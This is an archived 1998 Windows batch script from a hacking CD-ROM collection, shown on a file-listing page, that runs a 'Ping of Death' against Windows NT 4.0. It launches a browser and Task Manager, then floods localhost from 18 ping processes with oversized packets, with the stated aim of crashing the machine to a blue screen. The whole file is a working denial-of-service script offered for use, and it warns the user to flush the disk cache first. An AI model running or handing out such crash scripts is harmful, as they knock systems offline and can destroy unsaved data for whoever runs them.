home *** CD-ROM | disk | FTP | other *** search
/ Hacks & Cracks / Hacks_and_Cracks.iso / hackersclub / km / downloads / nt / nt4crash.txt < prev    next >
Text File  |  1998-03-25  |  2KB  |  47 lines

  1. @echo off
  2. cls
  3. echo ------------------------------------------------------------------------------
  4. echo IMPORTANT INFO:
  5. echo.
  6. echo This Ping of Death works best if you try to surf the Internet
  7. echo at the same time.  Now I will try to start the web browser for
  8. echo you right now.  If it does not start, please start one right now.
  9. echo.
  10. echo More info at http://www.sophist.demon.co.uk/ping/
  11. echo Author of this batch file can be reached at [ag115@freenet.carleton.ca]
  12. echo.
  13. echo This crashes the author's NT 4.0 Service Pack 1 system reliably
  14. echo and one other system.  A third system didn't work, though.
  15. echo THIS SCRIPT PROBABLY DOES NOT CRASH SYSTEMS OTHER THAN THE ONE THIS RUNS ON!
  16. echo.
  17. echo Please flush your disk cache first to be on the safe side.
  18. echo This is done by hitting Ctrl-Alt-Delete once then hiting Esc to return.
  19. echo ------------------------------------------------------------------------------
  20. echo.
  21. echo Attempting to launch Web Browser, please wait...
  22. start /high http://www.microsoft.com/
  23. echo When a web browser is up, press any key to start Ping of Death on localhost.
  24. pause
  25. cls
  26. echo ------------------------------------------------------------------------------
  27. echo Now Initiating Ping of Death flood to localhost!
  28. echo ------------------------------------------------------------------------------
  29. echo.
  30. echo This may take a few minutes, especially if you only have 16 or 32 MB.
  31. echo Please wait until the prompt returns before you try to surf.
  32. echo Forking Ping of Death processes...
  33. REM Seems to work best with taskman loaded, for some weird reason.
  34. start /high /min taskmgr.exe
  35. for %%d in ( A B C D E F G H I J K L M N O P Q R ) do start /min ping -l 65527 -n 1000 localhost
  36. cls
  37. echo ------------------------------------------------------------------------------
  38. echo READY TO CRASH WITHIN THE HOUR!
  39. echo.
  40. echo Ping of Death in now in progress...Surf and Die - pun intended. ;-)
  41. echo You should see the blue screen with a STOP error soon.
  42. echo.
  43. echo You may surf now.  Remember, it may take 10 mins to crash. Or less. Or more.
  44. echo And not all NT 4.0 systems will crash with this script.
  45. echo You could try launching TaskMgr and a few small apps to expedite the crash.
  46. echo ------------------------------------------------------------------------------
  47.